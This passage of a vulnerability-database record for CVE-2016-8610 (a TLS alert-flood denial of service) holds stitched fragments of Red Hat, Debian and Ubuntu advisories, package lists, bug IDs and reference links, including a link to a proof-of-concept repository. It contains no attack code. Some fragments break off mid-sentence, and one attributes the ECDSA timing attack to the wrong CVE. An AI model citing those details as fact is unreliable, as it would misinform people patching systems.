Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1384743 - CVE-2016-8610 SSL/TLS: Malformed plain-text ALERT packets could cause remote DoS\n1416852 - CVE-2017-3731 openssl: Truncated packet could crash via OOB read\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.4.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-1.0.1e-48.el6_8.4.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.4.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.4.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.4.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.4.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.4.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.4.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.4.src.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-1.0.1e-48.el6_8.4.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.4.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.4.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.4.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.4.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.4.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.4.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.4.i686.rpm\n\nppc64:\nopenssl-1.0.1e-48.el6_8.4.ppc.rpm\nopenssl-1.0.1e-48.el6_8.4.ppc64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.4.ppc.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.4.ppc64.rpm\nopenssl-devel-1.0.1e-48.el6_8.4.ppc.rpm\nopenssl-devel-1.0.1e-48.el6_8.4.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-48.el6_8.4.s390.rpm\nopenssl-1.0.1e-48.el6_8.4.s390x.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.4.s390.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.4.s390x.rpm\nopenssl-devel-1.0.1e-48.el6_8.4.s390.rpm\nopenssl-devel-1.0.1e-48.el6_8.4.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-1.0.1e-48.el6_8.4.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.4.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.4.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.4.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-48.el6_8.4.ppc64.rpm\nopenssl-perl-1.0.1e-48.el6_8.4.ppc64.rpm\nopenssl-static-1.0.1e-48.el6_8.4.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-48.el6_8.4.s390x.rpm\nopenssl-perl-1.0.1e-48.el6_8.4.s390x.rpm\nopenssl-static-1.0.1e-48.el6_8.4.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.4.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.4.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.4.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.4.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-1.0.1e-48.el6_8.4.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.4.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.4.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.4.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.4.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.4.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.4.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-60.el7_3.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-libs-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-libs-1.0.1e-60.el7_3.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-devel-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-devel-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-perl-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-static-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-static-1.0.1e-60.el7_3.1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-60.el7_3.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-libs-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-libs-1.0.1e-60.el7_3.1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-devel-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-devel-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-perl-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-static-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-static-1.0.1e-60.el7_3.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-60.el7_3.1.src.rpm\n\naarch64:\nopenssl-1.0.1e-60.el7_3.1.aarch64.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.aarch64.rpm\nopenssl-devel-1.0.1e-60.el7_3.1.aarch64.rpm\nopenssl-libs-1.0.1e-60.el7_3.1.aarch64.rpm\n\nppc64:\nopenssl-1.0.1e-60.el7_3.1.ppc64.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.ppc.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.ppc64.rpm\nopenssl-devel-1.0.1e-60.el7_3.1.ppc.rpm\nopenssl-devel-1.0.1e-60.el7_3.1.ppc64.rpm\nopenssl-libs-1.0.1e-60.el7_3.1.ppc.rpm\nopenssl-libs-1.0.1e-60.el7_3.1.ppc64.rpm\n\nppc64le:\nopenssl-1.0.1e-60.el7_3.1.ppc64le.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.ppc64le.rpm\nopenssl-devel-1.0.1e-60.el7_3.1.ppc64le.rpm\nopenssl-libs-1.0.1e-60.el7_3.1.ppc64le.rpm\n\ns390x:\nopenssl-1.0.1e-60.el7_3.1.s390x.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.s390.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.s390x.rpm\nopenssl-devel-1.0.1e-60.el7_3.1.s390.rpm\nopenssl-devel-1.0.1e-60.el7_3.1.s390x.rpm\nopenssl-libs-1.0.1e-60.el7_3.1.s390.rpm\nopenssl-libs-1.0.1e-60.el7_3.1.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-devel-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-devel-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-libs-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-libs-1.0.1e-60.el7_3.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\naarch64:\nopenssl-debuginfo-1.0.1e-60.el7_3.1.aarch64.rpm\nopenssl-perl-1.0.1e-60.el7_3.1.aarch64.rpm\nopenssl-static-1.0.1e-60.el7_3.1.aarch64.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-60.el7_3.1.ppc.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.ppc64.rpm\nopenssl-perl-1.0.1e-60.el7_3.1.ppc64.rpm\nopenssl-static-1.0.1e-60.el7_3.1.ppc.rpm\nopenssl-static-1.0.1e-60.el7_3.1.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.1e-60.el7_3.1.ppc64le.rpm\nopenssl-perl-1.0.1e-60.el7_3.1.ppc64le.rpm\nopenssl-static-1.0.1e-60.el7_3.1.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-60.el7_3.1.s390.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.s390x.rpm\nopenssl-perl-1.0.1e-60.el7_3.1.s390x.rpm\nopenssl-static-1.0.1e-60.el7_3.1.s390.rpm\nopenssl-static-1.0.1e-60.el7_3.1.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-perl-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-static-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-static-1.0.1e-60.el7_3.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-60.el7_3.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-devel-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-devel-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-libs-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-libs-1.0.1e-60.el7_3.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-debuginfo-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-perl-1.0.1e-60.el7_3.1.x86_64.rpm\nopenssl-static-1.0.1e-60.el7_3.1.i686.rpm\nopenssl-static-1.0.1e-60.el7_3.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-8610\nhttps://access.redhat.com/security/cve/CVE-2017-3731\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://www.openssl.org/news/secadv/20170126.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2017 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFYqs1TXlSAg2UNWIIRAt7bAJ0ZCDFTFcNP3/qrBxA46aRJQAvxkACaA9Ak\n1zK4rWazcUYTZw5zQhD4SXA=\n=I+Z7\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. This software, such as Apache HTTP Server, is\ncommon to multiple JBoss middleware products, and is packaged under Red Hat\nJBoss Core Services to allow for faster distribution of updates, and for a\nmore consistent update experience. \n\nSecurity Fix(es):\n\n* A memory leak flaw was found in the way OpenSSL handled TLS status\nrequest extension data during session renegotiation. A remote attacker\ncould cause a TLS server using OpenSSL to consume an excessive amount of\nmemory and, possibly, exit unexpectedly after exhausting all available\nmemory, if it enabled OCSP stapling support. (CVE-2016-6304)\n\n* It was discovered that the mod_session_crypto module of httpd did not use\nany mechanisms to verify integrity of the encrypted session data stored in\nthe user\u0027s browser. (CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not\nproperly check for memory allocation failures. (CVE-2016-2161)\n\n* A timing attack flaw was found in OpenSSL that could allow a malicious\nuser with local access to recover ECDSA P-256 private keys. \n(CVE-2016-8610)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed\ncertain characters not permitted by the HTTP protocol specification to\nappear unencoded in HTTP request headers. If httpd was used in conjunction\nwith a proxy or backend server that interpreted those characters\ndifferently, a remote attacker could possibly use this flaw to inject data\ninto HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\n* A vulnerability was found in httpd\u0027s handling of the LimitRequestFields\ndirective in mod_http2, affecting servers with HTTP/2 enabled. (CVE-2016-8740)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304\nand Shi Lei (Gear Team of Qihoo 360 Inc.) for reporting CVE-2016-8610. \nUpstream acknowledges Shi Lei (Gear Team of Qihoo 360 Inc.) as the original\nreporter of CVE-2016-6304. After installing the updated\npackages, the httpd daemon will be restarted automatically. Bugs fixed (https://bugzilla.redhat.com/):\n\n1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth\n1384743 - CVE-2016-8610 SSL/TLS: Malformed plain-text ALERT packets could cause remote DoS\n1401528 - CVE-2016-8740 httpd: Incomplete handling of LimitRequestFields directive in mod_http2\n1406744 - CVE-2016-0736 httpd: Padding Oracle in Apache mod_session_crypto\n1406753 - CVE-2016-2161 httpd: DoS vulnerability in mod_auth_digest\n1406822 - CVE-2016-8743 httpd: Apache HTTP Request Parsing Whitespace Defects\n1412120 - CVE-2016-7056 openssl: ECDSA P-256 timing attack key recovery\n\n6. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-319 - Errata for httpd 2.4.23 SP1 RHEL 7\n\n7. \n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies. If sendfile processing completed quickly, it was\npossible for the Processor to be added to the processor cache twice. This\ncould lead to invalid responses or information disclosure. (CVE-2017-5647)\n\n* A vulnerability was discovered in the error page mechanism in Tomcat\u0027s\nDefaultServlet implementation. A crafted HTTP request could cause undesired\nside effects, possibly including the removal or replacement of the custom\nerror page. Solution:\n\nBefore applying the update, back up your existing Red Hat JBoss Web Server\ninstallation (including all applications and configuration files). \n\nCVE-2016-8610\n\n It was discovered that no limit was imposed on alert packets during\n an SSL handshake. \n\nCVE-2017-3731\n\n Robert Swiecki discovered that the RC4-MD5 cipher when running on\n 32 bit systems could be forced into an out-of-bounds read, resulting\n in denial of service. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.0.1t-1+deb8u6. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.1.0d-1 of the openssl source package and in version 1.0.2k-1\nof the openssl1.0 source package. \n\nWe recommend that you upgrade your openssl packages. 6) - i386, x86_64\n\n3. \n\nThe following packages have been upgraded to a later upstream version:\ngnutls (2.12.23). \n(CVE-2016-8610)\n\n* Multiple flaws were found in the way gnutls processed OpenPGP\ncertificates. An attacker could create specially crafted OpenPGP\ncertificates which, when parsed by gnutls, would cause it to crash. Bugs fixed (https://bugzilla.redhat.com/):\n\n1320982 - ASSERT failure in gnutls-cli-debug\n1321112 - DHE_DSS ciphers don\u0027t work with client certificates and OpenSSL using TLSv1.2\n1323215 - gnutls-serv --http crashes with client certificates with NSS client\n1326073 - GnuTLS prefers SHA-1 signatures in TLSv1.2\n1326389 - GnuTLS server does not accept SHA-384 and SHA-512 Certificate Verify signatures despite advertising support for them\n1326886 - GnuTLS server rejects connections that do not advertise support for SHA-1 signature algorithms\n1327656 - gnutls-serv: closing connection without sending an Alert message\n1328205 - gnutls-cli won\u0027t send certificates that don\u0027t match hashes in Certificate Request\n1333521 - Provide ability to set the expected server name in gnutls-serv utility\n1335924 - gnutls: Disable TLS connections with less than 1024-bit DH parameters\n1337460 - Disable/remove export ciphersuites in GnuTLS\n1384743 - CVE-2016-8610 SSL/TLS: Malformed plain-text ALERT packets could cause remote DoS\n1411836 - CVE-2017-5337 gnutls: Heap read overflow in read-packet.c\n1412235 - CVE-2017-5335 gnutls: Out of memory while parsing crafted OpenPGP certificate\n1412236 - CVE-2017-5336 gnutls: Stack overflow in cdk_pk_get_keyid\n1415682 - Changes introduced by rebase to 2.12.23 break API and ABI compatibility for some libraries\n\n6. \n===========================================================================\nUbuntu Security Notice USN-3183-2\nMarch 20, 2017\n\ngnutls26 vulnerability\n===========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nGnuTLS could be made to hang if it received specially crafted network\ntraffic. \n\nSoftware Description:\n- gnutls26: GNU TLS library\n\nDetails:\n\nUSN-3183-1 fixed CVE-2016-8610 in GnuTLS in Ubuntu 16.04 LTS and Ubuntu\n16.10. This update provides the corresponding update for Ubuntu 12.04 LTS\nand Ubuntu 14.04 LTS. \n\nOriginal advisory details:\n\n Stefan Buehler discovered that GnuTLS incorrectly verified the serial\n length of OCSP responses. This issue only applied\n to Ubuntu 16.04 LTS. (CVE-2016-7444)\n Shi Lei discovered that GnuTLS incorrectly handled certain warning alerts. This issue has only been addressed in\n Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-8610)\n It was discovered that GnuTLS incorrectly decoded X.509 certificates with a\n Proxy Certificate Information extension. This issue only affected Ubuntu 16.04 LTS\n and Ubuntu 16.10. (CVE-2017-5334)\n It was discovered that GnuTLS incorrectly handled certain OpenPGP\n certificates. (CVE-2017-5335, CVE-2017-5336, CVE-2017-5337)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n libgnutls26 2.12.23-12ubuntu2.7\n\nUbuntu 12.04 LTS:\n libgnutls26 2.12.14-5ubuntu3.14\n\nIn general, a standard system update will make all the necessary changes",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-8610"
},
{
"db": "BID",
"id": "93841"
},
{
"db": "VULHUB",
"id": "VHN-97430"
},
{
"db": "VULMON",
"id": "CVE-2016-8610"
},
{
"db": "PACKETSTORM",
"id": "141173"
},
{
"db": "PACKETSTORM",
"id": "142848"
},
{
"db": "PACKETSTORM",
"id": "143874"
},
{
"db": "PACKETSTORM",
"id": "140781"
},
{
"db": "PACKETSTORM",
"id": "141752"
},
{
"db": "PACKETSTORM",
"id": "141708"
},
{
"db": "PACKETSTORM",
"id": "140890"
}
],
"trust": 1.98
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2016-8610",
"trust": 2.8
},
{
"db": "BID",
"id": "93841",
"trust": 2.1
},
{
"db": "SECTRACK",
"id": "1037084",
"trust": 1.8
},
{
"db": "CNNVD",
"id": "CNNVD-201610-726",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2019.2173",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "141173",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "141752",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-92490",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-97430",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-8610",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "142848",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143874",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "140781",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "141708",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "140890",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-97430"
},
{
"db": "VULMON",
"id": "CVE-2016-8610"
},
{
"db": "BID",
"id": "93841"
},
{
"db": "PACKETSTORM",
"id": "141173"
},
{
"db": "PACKETSTORM",
"id": "142848"
},
{
"db": "PACKETSTORM",
"id": "143874"
},
{
"db": "PACKETSTORM",
"id": "140781"
},
{
"db": "PACKETSTORM",
"id": "141752"
},
{
"db": "PACKETSTORM",
"id": "141708"
},
{
"db": "PACKETSTORM",
"id": "140890"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-726"
},
{
"db": "NVD",
"id": "CVE-2016-8610"
}
]
},
"id": "VAR-201711-0007",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-97430"
}
],
"trust": 0.40555555
},
"last_update_date": "2026-03-09T20:19:58.494000Z",
"patch": {
"_id": null,
"data": [
{
"title": "OpenSSL Remediation measures for denial of service vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=65089"
},
{
"title": "Red Hat: Moderate: openssl security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20170286 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 6.4.16 natives update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20171659 - Security Advisory"
},
{
"title": "Red Hat: Moderate: gnutls security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20170574 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 6.4.16 natives update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20171658 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 for RHEL 6",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20171414 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20171415 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 for RHEL 7",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20171413 - Security Advisory"
},
{
"title": "Debian Security Advisories: DSA-3773-1 openssl -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=9f660812dd6a423f7e72aa57751d0031"
},
{
"title": "Red Hat: CVE-2016-8610",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2016-8610"
},
{
"title": "Amazon Linux AMI: ALAS-2017-803",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2017-803"
},
{
"title": "Ubuntu Security Notice: gnutls26 vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3183-2"
},
{
"title": "Ubuntu Security Notice: gnutls26, gnutls28 vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3183-1"
},
{
"title": "Ubuntu Security Notice: openssl vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3181-1"
},
{
"title": "Red Hat: Important: Red Hat JBoss Web Server 3.1.0 Service Pack 1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20171801 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Web Server Service Pack 1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20171802 - Security Advisory"
},
{
"title": "Amazon Linux AMI: ALAS-2017-815",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2017-815"
},
{
"title": "Oracle Linux Bulletins: Oracle Linux Bulletin - January 2017",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=ecbe5f193404d1e9c62e8323118ae6cf"
},
{
"title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - January 2017",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=04299a624c15ae57f9f110f484bc5f66"
},
{
"title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=6839c4d3fd328571c675c335d58b5591"
},
{
"title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2017",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=d78b3379ca364568964f30138964c7e7"
},
{
"title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - April 2017",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=bf8deceb640f4a0fee008855afe6aa85"
},
{
"title": "CVE-2016-8610-PoC",
"trust": 0.1,
"url": "https://github.com/cujanovic/CVE-2016-8610-PoC "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-8610"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-726"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-400",
"trust": 1.1
},
{
"problemtype": "CWE-399",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-97430"
},
{
"db": "NVD",
"id": "CVE-2016-8610"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.4,
"url": "http://www.securityfocus.com/bid/93841"
},
{
"trust": 2.1,
"url": "http://seclists.org/oss-sec/2016/q4/224"
},
{
"trust": 1.9,
"url": "http://rhn.redhat.com/errata/rhsa-2017-0286.html"
},
{
"trust": 1.9,
"url": "http://rhn.redhat.com/errata/rhsa-2017-0574.html"
},
{
"trust": 1.9,
"url": "https://access.redhat.com/errata/rhsa-2017:1413"
},
{
"trust": 1.9,
"url": "https://access.redhat.com/errata/rhsa-2017:2493"
},
{
"trust": 1.8,
"url": "http://www.securitytracker.com/id/1037084"
},
{
"trust": 1.8,
"url": "https://www.debian.org/security/2017/dsa-3773"
},
{
"trust": 1.8,
"url": "https://security.freebsd.org/advisories/freebsd-sa-16:35.openssl.asc"
},
{
"trust": 1.8,
"url": "https://access.redhat.com/errata/rhsa-2017:1414"
},
{
"trust": 1.8,
"url": "http://rhn.redhat.com/errata/rhsa-2017-1415.html"
},
{
"trust": 1.8,
"url": "https://access.redhat.com/errata/rhsa-2017:1658"
},
{
"trust": 1.8,
